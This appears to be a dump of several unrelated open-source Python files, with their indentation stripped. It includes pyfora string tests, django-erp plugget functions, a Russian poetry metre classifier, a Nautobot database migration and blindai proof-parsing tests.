runTest(lambda: f(1000000, 10, 2), "pyfora.string_slicing_10mm.2_char_large_string.native")
runTest(lambda: f(1000000, 10, 200), "pyfora.string_slicing_10mm.200_char_large_string.native")
runTest(lambda: f(10000, 1000, 2), "pyfora.string_slicing_10mm.2_char_small_string.native")
runTest(lambda: f(10000, 1000, 200), "pyfora.string_slicing_10mm.200_char_small_string.native")
sys.setcheckinterval(100)
def test_string_slicing_into_vector(self):
def testFunction(ct, passCt,chars):
x = "asdfasdf" * (ct / 8)
res = 0
for _ in xrange(passCt):
v = [x[ix*chars:ix*chars+chars] for ix in xrange(len(x) / chars)]
for e in v:
res = res + len(e)
return res
f = testFunction
self.evaluateWithExecutor(f, 1000000, 1, 2)
self.evaluateWithExecutor(f, 10000, 1, 2)
def runTest(func, name):
PerformanceTestReporter.PerfTest(name)(func)()
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2), "pyfora.string_slicing_into_vector_10mm.2_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 1000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2), "pyfora.string_slicing_into_vector_10mm.2_char_small_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 100000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_small_string.pyfora")
sys.setcheckinterval(100000)
runTest(lambda: f(1000000, 10, 2), "pyfora.string_slicing_into_vector_10mm.2_char_large_string.native")
runTest(lambda: f(1000000, 1000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_large_string.native")
runTest(lambda: f(10000, 1000, 2), "pyfora.string_slicing_into_vector_10mm.2_char_small_string.native")
runTest(lambda: f(10000, 100000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_small_string.native")
sys.setcheckinterval(100)
def test_string_splitlines(self):
#test a wide variety of strings with combinations of different separators
stringsToTest = []
for char1 in ["","a"]:
stringsToTest.append(char1)
for sep1 in ["\n","\r","\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]:
stringsToTest.append(char1 + sep1)
for char2 in ["","b"]:
stringsToTest.append(char1 + sep1 + char2)
for sep2 in ["\n","\r","\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]:
stringsToTest.append(char1 + sep1 + char2 + sep2)
def f():
res = []
for shouldSplit in [True, False]:
for candidate in stringsToTest:
res = res + [(candidate, candidate.splitlines(shouldSplit))]
self.equivalentEvaluationTest(f)
def test_string_split(self):
#test a wide variety of strings with combinations of different separators
stringsToTest = ["", "a", "aa", "ab", "aba", "aaa", "bbb", "abab", "abc"]
sepsToTest = ["a","b"]
def f():
res = []
for s in stringsToTest:
for sep in sepsToTest:
res = res + [(s,sep, s.split(sep))]
self.equivalentEvaluationTest(f)
def test_string_indexing_2(self):
def f(idx):
x = "asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf"
return x[idx]
self.equivalentEvaluationTest(f, -1)
self.equivalentEvaluationTest(f, -2)
self.equivalentEvaluationTest(f, 0)
self.equivalentEvaluationTest(f, 1)
def test_string_comparison(self):
def f():
a = "a"
b = "b"
r1 = a < b
r2 = a > b
return (r1, r2)
self.equivalentEvaluationTest(f)
def test_string_duplication(self):
def f():
a = "asdf"
r1 = a * 20
r2 = 20 * a
return (r1, r2)
self.equivalentEvaluationTest(f)
def test_string_equality_methods(self):
def f():
a = "val1"
b = "val1"
r1 = a == b
r2 = a != b
a = "val2"
r3 = a == b
r4 = a != b
r5 = a.__eq__(b)
r6 = a.__ne__(b)
return (r1, r2, r3, r4, r5, r6)
self.equivalentEvaluationTest(f)
def test_large_strings(self):
def f():
a = "val1"
while len(a) < 1000000:
a = a + a
return a
self.equivalentEvaluationTest(f)
def test_define_constant_string(self):
x = "a string"
with self.create_executor() as executor:
define_x = executor.define(x)
fora_x = define_x.result()
self.assertIsNotNone(fora_x)
def test_compute_string(self):
def f():
return "a string"
remote = self.evaluateWithExecutor(f)
self.assertEqual(f(), remote)
self.assertTrue(isinstance(remote, str))
def test_strings_1(self):
def f():
x = "asdf"
return x
self.equivalentEvaluationTest(f)
|
djangoerp/pluggets/pluggets.py
|
xarala221/django-erp
| 345 |
61877
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django.utils.translation import ugettext_noop as _
from djangoerp.menus.utils import get_bookmarks_for
from djangoerp.menus.models import Menu
from .loading import registry
from .forms import TextPluggetForm
def dummy(context):
return registry.default_func(context)
def menu(context):
"""Menu plugget.
Simply renders a menu.
"""
"""
It adds a context variables:
* name -- Slug of selected menu.
"""
pk = None
if "menu_id" in context:
# NOTE: Here, "context" is not a simple dict instance, so we can't use:
#
# >> pk = context.pop("menu_id", None)
#
pk = context.get('menu_id')
del context['menu_id']
if pk:
menu = Menu.objects.get(pk=pk)
context["name"] = menu.slug
return context
def bookmarks_menu(context):
"""Bookmarks plugget.
Shows all your bookmarks.
"""
if 'user' in context:
context['menu_id'] = get_bookmarks_for(context['user'].username).pk
return menu(context)
registry.register_simple_plugget_source(_("Text plugget"), _("Simply renders a text paragraph."), form=TextPluggetForm)
|
tests/contrib/test_cached_dataset.py
|
mmathys/bagua
| 635 |
61948
|
from bagua.torch_api.contrib.cached_dataset import CachedDataset
from torch.utils.data.dataset import Dataset
import numpy as np
import logging
import unittest
from tests import skip_if_cuda_available
logging.basicConfig(level=logging.DEBUG)
class MyDataset(Dataset):
def __init__(self, size):
self.size = size
self.dataset = [(np.random.rand(5, 2), np.random.rand(1)) for _ in range(size)]
def __getitem__(self, item):
return self.dataset[item]
def __len__(self):
return self.size
class TestCacheDataset(unittest.TestCase):
def check_dataset(self, dataset, cache_dataset):
for _ in range(10):
for _, _ in enumerate(cache_dataset):
pass
for i in range(len(dataset)):
self.assertTrue((dataset[i][0] == cache_dataset[i][0]).all())
self.assertTrue((dataset[i][1] == cache_dataset[i][1]).all())
@skip_if_cuda_available()
def test_redis(self):
dataset1 = MyDataset(102)
dataset2 = MyDataset(102)
cache_dataset1 = CachedDataset(
dataset1,
backend="redis",
dataset_name="d1",
)
cache_dataset2 = CachedDataset(
dataset2,
backend="redis",
dataset_name="d2",
)
cache_dataset1.cache_loader.store.clear()
self.check_dataset(dataset1, cache_dataset1)
self.assertEqual(cache_dataset1.cache_loader.num_keys(), len(dataset1))
self.check_dataset(dataset2, cache_dataset2)
self.assertEqual(
cache_dataset2.cache_loader.num_keys(), len(dataset1) + len(dataset2)
)
if __name__ == "__main__":
unittest.main()
|
rupo/metre/metre_classifier.py
|
dagrigorev/rupo
| 171 |
61954
|
<filename>rupo/metre/metre_classifier.py
# -*- coding: utf-8 -*-
# Автор: <NAME>
# Описание: Классификатор метра.
from collections import OrderedDict
from typing import List, Dict, Tuple
import jsonpickle
import logging
from rupo.main.markup import Line, Markup
from rupo.util.mixins import CommonMixin
from rupo.metre.pattern_analyzer import PatternAnalyzer
from rupo.util.preprocess import get_first_vowel_position
from rupo.util.timeit import timeit
class StressCorrection(CommonMixin):
"""
Исправление ударения.
"""
def __init__(self, line_number: int, word_number: int, syllable_number: int,
word_text: str, stress: int) -> None:
"""
:param line_number: номер строки.
:param word_number: номер слова.
:param syllable_number: номер слога.
:param word_text: текст слова.
:param stress: позиция ударения (с 0).
"""
self.line_number = line_number
self.word_number = word_number
self.syllable_number = syllable_number
self.word_text = word_text
self.stress = stress
class ClassificationResult(CommonMixin):
"""
Результат классификации стихотворения по метру.
"""
def __init__(self, count_lines: int=0) -> None:
"""
:param count_lines: количество строк.
"""
self.metre = None
self.count_lines = count_lines
self.errors_count = {k: 0 for k in MetreClassifier.metres.keys()} # type: Dict[str, int]
self.corrections = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]]
self.resolutions = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]]
self.additions = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]]
def get_metre_errors_count(self):
"""
:return: получить количество ошибок на заданном метре.
"""
return self.errors_count[self.metre]
def to_json(self):
"""
:return: сериализация в json.
"""
return jsonpickle.encode(self)
@staticmethod
def str_corrections(collection: List[StressCorrection]) -> str:
"""
:param collection: список исправлений.
:return: его строковое представление.
"""
return"\n".join([str((item.word_text, item.syllable_number)) for item in collection])
def __str__(self):
st = "Метр: " + str(self.metre) + "\n"
st += "Снятая омография: \n" + ClassificationResult.str_corrections(self.resolutions[self.metre]) + "\n"
st += "Неправильные ударения: \n" + ClassificationResult.str_corrections(self.corrections[self.metre]) + "\n"
st += "Новые ударения: \n" + ClassificationResult.str_corrections(self.additions[self.metre]) + "\n"
return st
class ErrorsTableRecord:
def __init__(self, strong_errors, weak_errors, pattern, failed=False):
self.strong_errors = strong_errors
self.weak_errors = weak_errors
self.pattern = pattern
self.failed = failed
def __str__(self):
return self.pattern + " " + str(self.strong_errors) + " " + str(self.weak_errors)
def __repr__(self):
return self.__str__()
class ErrorsTable:
def __init__(self, num_lines):
self.data = {}
self.num_lines = num_lines
self.coef = OrderedDict(
[("iambos", 0.3),
("choreios", 0.3),
("daktylos", 0.4),
("amphibrachys", 0.4),
("anapaistos", 0.4),
("dolnik3", 0.5),
("dolnik2", 0.5),
("taktovik3", 6.0),
("taktovik2", 6.0)
])
self.sum_coef = OrderedDict(
[("iambos", 0.0),
("choreios", 0.0),
("daktylos", 0.0),
("amphibrachys", 0.0),
("anapaistos", 0.0),
("dolnik3", 0.035),
("dolnik2", 0.035),
("taktovik3", 0.10),
("taktovik2", 0.10)
])
for metre_name in MetreClassifier.metres.keys():
self.data[metre_name] = [ErrorsTableRecord(0, 0, "") for _ in range(num_lines)]
def add_record(self, metre_name, line_num, strong_errors, weak_errors, pattern, failed=False):
self.data[metre_name][line_num] = ErrorsTableRecord(strong_errors, weak_errors, pattern, failed)
def get_best_metre(self):
for l in range(self.num_lines):
strong_sum = 0
weak_sum = 0
for metre_name in self.data.keys():
strong_sum += self.data[metre_name][l].strong_errors
weak_sum += self.data[metre_name][l].weak_errors
for metre_name, column in self.data.items():
if strong_sum != 0:
column[l].strong_errors = column[l].strong_errors / float(strong_sum)
if weak_sum != 0:
column[l].weak_errors = column[l].weak_errors / float(weak_sum)
sums = dict()
for metre_name in self.data.keys():
sums[metre_name] = (0, 0)
for metre_name, column in self.data.items():
strong_sum = 0
weak_sum = 0
for l in range(self.num_lines):
strong_sum += column[l].strong_errors
weak_sum += column[l].weak_errors
sums[metre_name] = (strong_sum, weak_sum)
for metre_name, pair in sums.items():
sums[metre_name] = self.sum_coef[metre_name] + (pair[0] + pair[1] / 2.0) * self.coef[metre_name] / self.num_lines
logging.debug(sums)
return min(sums, key=sums.get)
class MetreClassifier(object):
"""
Классификатор, считает отклонения от стандартных шаблонов ритма(метров).
"""
metres = OrderedDict(
[("iambos", '(us)*(uS)(U)?(U)?'),
("choreios", '(su)*(S)(U)?(U)?'),
("daktylos", '(suu)*(S)(U)?(U)?'),
("amphibrachys", '(usu)*(uS)(U)?(U)?'),
("anapaistos", '(uus)*(uuS)(U)?(U)?'),
("dolnik3", '(u)?(u)?((su)(u)?)*(S)(U)?(U)?'),
("dolnik2", '(u)?(u)?((s)(u)?)*(S)(U)?(U)?'),
("taktovik3", '(u)?(u)?((su)(u)?(u)?)*(S)(U)?(U)?'),
("taktovik2", '(u)?(u)?((s)(u)?(u)?)*(S)(U)?(U)?')
])
border_syllables_count = 20
@staticmethod
@timeit
def classify_metre(markup):
"""
Классифицируем стихотворный метр.
:param markup: разметка.
:return: результат классификации.
"""
result = ClassificationResult(len(markup.lines))
num_lines = len(markup.lines)
errors_table = ErrorsTable(num_lines)
for l, line in enumerate(markup.lines):
for metre_name, metre_pattern in MetreClassifier.metres.items():
line_syllables_count = sum([len(word.syllables) for word in line.words])
# Строчки длиной больше border_syllables_count слогов не обрабатываем.
if line_syllables_count > MetreClassifier.border_syllables_count or line_syllables_count == 0:
continue
error_border = 7
if metre_name == "dolnik2" or metre_name == "dolnik3":
error_border = 3
if metre_name == "taktovik2" or metre_name == "taktovik3":
error_border = 2
pattern, strong_errors, weak_errors, analysis_errored = \
PatternAnalyzer.count_errors(MetreClassifier.metres[metre_name],
MetreClassifier.__get_line_pattern(line),
error_border)
if analysis_errored or len(pattern) == 0:
errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern, True)
continue
corrections = MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern)[0]
accentuation_errors = len(corrections)
strong_errors += accentuation_errors
errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern)
result.metre = errors_table.get_best_metre()
# Запомним все исправления.
for l, line in enumerate(markup.lines):
pattern = errors_table.data[result.metre][l].pattern
failed = errors_table.data[result.metre][l].failed
if failed or len(pattern) == 0:
continue
corrections, resolutions, additions =\
MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern)
result.corrections[result.metre] += corrections
result.resolutions[result.metre] += resolutions
result.additions[result.metre] += additions
result.errors_count[result.metre] += len(corrections)
return result
@staticmethod
def __get_line_pattern(line: Line) -> str:
"""
Сопоставляем строку шаблону, считаем ошибки.
:param line: строка.
:return: количество ошибок
"""
pattern = ""
for w, word in enumerate(line.words):
if len(word.syllables) == 0:
pattern += "U"
else:
for syllable in word.syllables:
if syllable.stress != -1:
pattern += "S"
else:
pattern += "U"
return pattern
@staticmethod
def __get_line_pattern_matching_corrections(line: Line, line_number: int, pattern: str) \
-> Tuple[List[StressCorrection], List[StressCorrection], List[StressCorrection]]:
"""
Ударения могут приходиться на слабое место,
если безударный слог того же слова не попадает на икт. Иначе - ошибка.
:param line: строка.
:param line_number: номер строки.
:param pattern: шаблон.
:return: ошибки, дополнения и снятия
"""
corrections = []
resolutions = []
additions = []
number_in_pattern = 0
for w, word in enumerate(line.words):
# Игнорируем слова длиной меньше 2 слогов.
if len(word.syllables) == 0:
continue
if len(word.syllables) == 1:
if pattern[number_in_pattern].lower() == "s" and word.syllables[0].stress == -1:
additions.append(StressCorrection(line_number, w, 0, word.text, word.syllables[0].vowel()))
number_in_pattern += len(word.syllables)
continue
stress_count = word.count_stresses()
for syllable in word.syllables:
if stress_count == 0 and pattern[number_in_pattern].lower() == "s":
# Ударений нет, ставим такое, какое подходит по метру. Возможно несколько.
additions.append(StressCorrection(line_number, w, syllable.number, word.text, syllable.vowel()))
elif pattern[number_in_pattern].lower() == "u" and syllable.stress != -1:
# Ударение есть и оно падает на этот слог, при этом в шаблоне безударная позиция.
# Найдём такой слог, у которого в шаблоне ударная позиция. Это и есть наше исправление.
for other_syllable in word.syllables:
other_number_in_pattern = other_syllable.number - syllable.number + number_in_pattern
if syllable.number == other_syllable.number or pattern[other_number_in_pattern].lower() != "s":
continue
ac = StressCorrection(line_number, w, other_syllable.number, word.text, other_syllable.vowel())
if stress_count == 1 and other_syllable.stress == -1:
corrections.append(ac)
else:
resolutions.append(ac)
number_in_pattern += 1
return corrections, resolutions, additions
@staticmethod
def get_improved_markup(markup: Markup, result: ClassificationResult) -> Markup:
"""
Улучшаем разметку после классификации метра.
:param markup: начальная разметка.
:param result: результат классификации.
:return: улучшенная разметка.
"""
for pos in result.corrections[result.metre] + result.resolutions[result.metre]:
syllables = markup.lines[pos.line_number].words[pos.word_number].syllables
for i, syllable in enumerate(syllables):
syllable.stress = -1
if syllable.number == pos.syllable_number:
syllable.stress = syllable.begin + get_first_vowel_position(syllable.text)
for pos in result.additions[result.metre]:
syllable = markup.lines[pos.line_number].words[pos.word_number].syllables[pos.syllable_number]
syllable.stress = syllable.begin + get_first_vowel_position(syllable.text)
return markup
@staticmethod
def improve_markup(markup: Markup) -> \
Tuple[Markup, ClassificationResult]:
"""
Улучшение разметки метрическим классификатором.
:param markup: начальная разметка.
"""
result = MetreClassifier.classify_metre(markup)
improved_markup = MetreClassifier.get_improved_markup(markup, result)
return improved_markup, result
|
nautobot/dcim/migrations/0003_initial_part_3.py
|
psmware-ltd/nautobot
| 384 |
61966
|
# Generated by Django 3.1.7 on 2021-04-01 06:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import mptt.fields
import nautobot.extras.models.statuses
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
("contenttypes", "0002_remove_content_type_name"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("tenancy", "0001_initial"),
("extras", "0001_initial_part_1"),
("dcim", "0002_initial_part_2"),
("ipam", "0001_initial_part_1"),
]
operations = [
migrations.AddField(
model_name="rackreservation",
name="user",
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name="rackgroup",
name="parent",
field=mptt.fields.TreeForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="children",
to="dcim.rackgroup",
),
),
migrations.AddField(
model_name="rackgroup",
name="site",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="rack_groups", to="dcim.site"
),
),
migrations.AddField(
model_name="rack",
name="group",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="racks",
to="dcim.rackgroup",
),
),
migrations.AddField(
model_name="rack",
name="role",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="racks",
to="dcim.rackrole",
),
),
migrations.AddField(
model_name="rack",
name="site",
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name="racks", to="dcim.site"),
),
migrations.AddField(
model_name="rack",
name="status",
field=nautobot.extras.models.statuses.StatusField(
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="dcim_rack_related",
to="extras.status",
),
),
migrations.AddField(
model_name="rack",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="rack",
name="tenant",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="racks",
to="tenancy.tenant",
),
),
migrations.AddField(
model_name="powerporttemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="powerporttemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="powerport",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="powerport",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="powerport",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="powerport",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="powerports", to="dcim.device"
),
),
migrations.AddField(
model_name="powerport",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="powerpanel",
name="rack_group",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to="dcim.rackgroup"
),
),
migrations.AddField(
model_name="powerpanel",
name="site",
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to="dcim.site"),
),
migrations.AddField(
model_name="powerpanel",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="poweroutlettemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="poweroutlettemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="poweroutlettemplate",
name="power_port",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="poweroutlet_templates",
to="dcim.powerporttemplate",
),
),
migrations.AddField(
model_name="poweroutlet",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="poweroutlet",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="poweroutlet",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="poweroutlet",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="poweroutlets", to="dcim.device"
),
),
migrations.AddField(
model_name="poweroutlet",
name="power_port",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="poweroutlets",
to="dcim.powerport",
),
),
migrations.AddField(
model_name="poweroutlet",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="powerfeed",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="powerfeed",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="powerfeed",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="powerfeed",
name="power_panel",
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT, related_name="powerfeeds", to="dcim.powerpanel"
),
),
migrations.AddField(
model_name="powerfeed",
name="rack",
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to="dcim.rack"),
),
migrations.AddField(
model_name="powerfeed",
name="status",
field=nautobot.extras.models.statuses.StatusField(
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="dcim_powerfeed_related",
to="extras.status",
),
),
migrations.AddField(
model_name="powerfeed",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="platform",
name="manufacturer",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="platforms",
to="dcim.manufacturer",
),
),
migrations.AddField(
model_name="inventoryitem",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="inventoryitems", to="dcim.device"
),
),
migrations.AddField(
model_name="inventoryitem",
name="manufacturer",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="inventory_items",
to="dcim.manufacturer",
),
),
migrations.AddField(
model_name="inventoryitem",
name="parent",
field=mptt.fields.TreeForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="child_items",
to="dcim.inventoryitem",
),
),
migrations.AddField(
model_name="inventoryitem",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="interfacetemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="interfacetemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="interface",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="interface",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="interface",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="interface",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="interfaces", to="dcim.device"
),
),
migrations.AddField(
model_name="interface",
name="lag",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="member_interfaces",
to="dcim.interface",
),
),
migrations.AddField(
model_name="interface",
name="tagged_vlans",
field=models.ManyToManyField(blank=True, related_name="interfaces_as_tagged", to="ipam.VLAN"),
),
migrations.AddField(
model_name="interface",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="interface",
name="untagged_vlan",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="interfaces_as_untagged",
to="ipam.vlan",
),
),
migrations.AddField(
model_name="frontporttemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="frontporttemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="frontporttemplate",
name="rear_port",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="frontport_templates",
to="dcim.rearporttemplate",
),
),
migrations.AddField(
model_name="frontport",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="frontport",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="frontport",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="frontports", to="dcim.device"
),
),
migrations.AddField(
model_name="frontport",
name="rear_port",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="frontports", to="dcim.rearport"
),
),
migrations.AddField(
model_name="frontport",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="devicetype",
name="manufacturer",
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT, related_name="device_types", to="dcim.manufacturer"
),
),
migrations.AddField(
model_name="devicetype",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="devicebaytemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="devicebaytemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="devicebay",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="devicebays", to="dcim.device"
),
),
migrations.AddField(
model_name="devicebay",
name="installed_device",
field=models.OneToOneField(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="parent_bay",
to="dcim.device",
),
),
migrations.AddField(
model_name="devicebay",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
]
|
client/tests/test_proof.py
|
mithril-security/blindai
| 121 |
62033
|
from copy import deepcopy
from hashlib import sha256
import os
import unittest
from google.protobuf.timestamp_pb2 import Timestamp
from blindai.pb.securedexchange_pb2 import (
Payload,
)
from blindai.client import (
RunModelResponse,
UploadModelResponse,
)
from blindai.dcap_attestation import Policy
from blindai.utils.errors import SignatureError, AttestationError
from .covidnet import get_input, get_model
exec_run = os.path.join(os.path.dirname(__file__), "exec_run.proof")
exec_upload = os.path.join(os.path.dirname(__file__), "exec_upload.proof")
tmp_path = os.path.join(os.path.dirname(__file__), "tmp_exec.proof")
policy_file = os.path.join(os.path.dirname(__file__), "policy.toml")
class TestProof(unittest.TestCase):
def test_parse_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
self.assertTrue(response.is_signed())
response2 = RunModelResponse()
with open(exec_run, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
self.assertEqual(response.output, response2.output)
response3 = RunModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
self.assertEqual(response.output, response3.output)
response3.save_to_file(tmp_path)
response4 = RunModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
self.assertEqual(response.output, response4.output)
def test_parse_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
self.assertTrue(response.is_signed())
response2 = UploadModelResponse()
with open(exec_upload, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
response3 = UploadModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
response3.save_to_file(tmp_path)
response4 = UploadModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
